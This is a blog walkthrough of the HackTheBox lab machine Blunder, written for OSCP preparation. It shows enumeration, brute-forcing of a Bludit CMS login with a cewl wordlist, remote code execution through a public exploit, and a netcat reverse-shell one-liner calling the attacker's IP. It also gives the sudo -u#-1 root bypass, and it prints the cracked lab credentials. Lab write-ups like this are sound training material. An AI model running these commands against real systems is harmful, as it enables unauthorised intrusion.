Road to OSCP 15: Blunder HackTheBox

Follow along in my OSCP journey, this is my target 15of the TJNULL’s OSCP list.

How to use this walkthrough?

To avoid the typical answer on a plate type of walkthrough, I have decided to follow the TryHackMe idea of giving you some hints along the way to help you when you struggle and keep the Try Harder mantra real.

Let’s go!

Enumeration

I use Tib3rius’ multi-threaded Autorecon which combines a couple of different tools to enumerate and scan services. It creates a simple file structure and provides you a nice overview of the services scanned.

python3 /opt/AutoRecon/autorecon.py -cs 25 -vv -o /home/kali/Documents/HTB/lab/ 10.10.10.191

Autorecon

While it runs, I usually look at the _quick_tcp_nmap.txt file while we wait for the _full_tcp_nmap.txt

PORT   STATE  SERVICE REASON         VERSION
21/tcp closed ftp     reset ttl 63
80/tcp open   http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: A0F0E5D852F0E3783AF700B6EE9D00DA
|_http-generator: Blunder
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts

Ok, so it seems like the path is quite straightforward as there is only 1 service that’s open.

Web — 80

First of all, the website just seems like a blog type template of interesting facts without many features to explore.

Nikto

Nikto is an old web scanner that is always good to run to get some quick info on the target. We get a lot of false positives with the admin page but we find a potential interesting file .gitignore

It’s seems that there are some remains from a git repo, let’s explore

We looked at those folders but nothing of value in the end

Let’s explore with a tool specialised in directory busting, gobuster.

gobuster dir -u http://10.10.10.191/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

/0 (Status: 200) [Size: 7561]
/LICENSE (Status: 200) [Size: 1083]
/about (Status: 200) [Size: 3280]
/admin (Status: 301) [Size: 0]
/cgi-bin/ (Status: 301) [Size: 0]
/install.php (Status: 200) [Size: 30]
/robots.txt (Status: 200) [Size: 22]
/robots.txt (Status: 200) [Size: 22]
/server-status (Status: 403) [Size: 277]
/todo.txt (Status: 200) [Size: 118]

There are a couple on interesting filenames on that list

• todo.txt

-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING

• install.php and /admin

First time we actually read the name of the app that is installed and we have a login page as well.

HINT

We’ve explored most of the application what are the logic paths we can with a login screen and the name of an app?

.

.

.

.

It’s time for exploit research and possibly login bypass or login bruteforce.

Based on the page source and the searchexploit research it seems the bludit version is 3.9.2

The authentication followed by the file upload seems like a nice vector, let’s look at our enumeration for a username

We also looked for the credentials direclty based on documentation but we didn’t have access

We also have the user found in the todo notes:

We tried the python bruteforce script but couldn’t fix encoding issues, we tried the ruby option instead

ruby 48746.rb -r http://10.10.10.191/admin/login.php -u fergus -w /usr/share/wordlists/rockyou.txt

But it doesn’t seem to work

HINT

Based on our current research most exploits for bludit require us to be authenticated, what other options than rockyou do we have?

.

.

.

.

That’s right, we know what the owner loves, let’s create a custom wordlist with the topics he enjoys using cewl.

# -d for the depth and -m for the min of characters
cewl -w customwordlist.txt -d 1 -m 7 http://10.10.10.191/0

Let’s run our bruteforce again with the new list:

ruby2.7 48746.rb -r http://10.10.10.191 -u fergus -w customwordlist.txt

Jackpot, let’s authenticate using fergus:RolandDeschain

We’re in!

Now that we’re in, we do realise there isn’t much to explore inside the admin dashboard, let’s pivot to the other exploits, reading the multiple/webapps/48701.txt exploit we realise that we can actually get RCE not only directory traversal. And reading the exploit for version for 3.9.12 (php/webapps/48568.py) we realise we can use it as well.

searchsploit -x multiple/webapps/48701.txt
searchsploit -x php/webapps/48568.py

We try to run it, without much success initially

python3 48568.py -u http://10.10.10.191 -user fergus -pass RolandDeschain -c "id"

HINT

When not having any outputs on our RCE attempts, what is a nice way to confirm if something is happening on the machine?

.

.

.

.

We want to test for blind execution, a nice way to do so, is trying to perform some action that we can witness from our machine such as web server acces using a classic file web server or ping using tcpdump.

updog -p 80

python3 48568.py -u http://10.10.10.191 -user fergus -pass RolandDeschain -c "wget http://10.10.14.46/test"

We confirm we have blind RCE ❤

Let’s get a reverse shell

# rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
python3 48568.py -u http://10.10.10.191 -user fergus -pass RolandDeschain -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.46 4444 >/tmp/f"

For some reason the exploit isn’t super reliable, I had to run the same command a couple of times for it to work. We’re in baby!

Time for some shell upgrade 😉 We actually struggled to get a fully functional tty shell but thanks to this article we found a way https://zweilosec.github.io/posts/upgrade-linux-shell/

1. In our kali terminal, before creating our listener we actually type ‘bash’
2. which python python2 python3 (find out if python2 or python3 is installed
3. python -c ‘import pty; pty.spawn(“/bin/bash”)’

3. Ctrl+Z

4. stty raw -echo

5. fg, Enter, Enter

We are the www-data user, so we don’t have a user flag yet, let’s explore the application for some possible password.

We tried cracking the passwords unsuccesfully. Let’s enumerate the users on the machine

We look at /etc/passwd + /home and we have 2 users: hugo and shaun

Let’s explore the usual locations for interesting files that www-data could have permission to /opt/ /var/www

It seems that the version that was mentioned in the todo notes is ready but the apache config files haven’t been updated yet, let’s explore the same users file

Let’s crack the password using crackstation

Let’s login as hugo:

Let’s get the user flag

Getting Root

The way I go about getting root is the following: I’ll look for some quick wins and then run some enumeration scripts to help me find some weaknesses.

Quick Wins

sudo -l → sudo permissions
ls -la /opt/ → looking for interesting executables or files
ls -la /var/www/; ls -la /var/www/html → possible configuration files with db pasword or even user password.
ls -la /etc/passwd; ls -la /etc/shadow → misconfigured permissions (write on passwd and read on shadow)

Ok we do get a hit immediately with sudo -l

Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash

HINT

Does this mean we can just run sudo /bin/bash? Have you seen that !root capability before?

.

.

.

.

It seems we can run /bin/bash as any user but root, let’s do some digging

Let’s open that up

let’s give that a try, we fail as it seems we need a tty shell, let’s get that and try again

sudo -u#-1 /bin/bash

What did I learn?

1. How to go through exploits, read them and understand how to use them properly.
2. How to create a fully usable TTY shell as the last part of the machine requires it to work.

Stream

I hope you guys enjoyed the walkthrough. Don’t hesitate to join me and struggle together on those machines on my twitch stream Wednesdays and Sundays.